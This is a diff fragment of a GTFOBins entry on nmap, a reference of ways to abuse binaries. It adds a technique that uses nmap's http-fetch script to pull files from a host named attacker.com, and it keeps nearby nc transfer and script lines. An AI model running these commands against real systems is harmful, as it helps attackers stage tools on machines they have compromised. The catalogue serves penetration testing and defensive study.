GTFOBins/GTFOBins.github.io/_gtfobins/nmap.md

         t:close();' > $TF
         nmap --script=$TF
   file-download:
     - description: Fetch remote file sent to a local TCP port.
+Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`.
+Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`.
+Also, it is important that the port is a commonly used HTTP like 80 or 8080.
+      code: |
+        RHOST=attacker.com
+        RPORT=8080
+        TF=$(mktemp -d)
+        LFILE=file_to_save
+        nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
+    - description: Fetch remote file sent to a local TCP port.
 Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
       code: |
         export LPORT=12345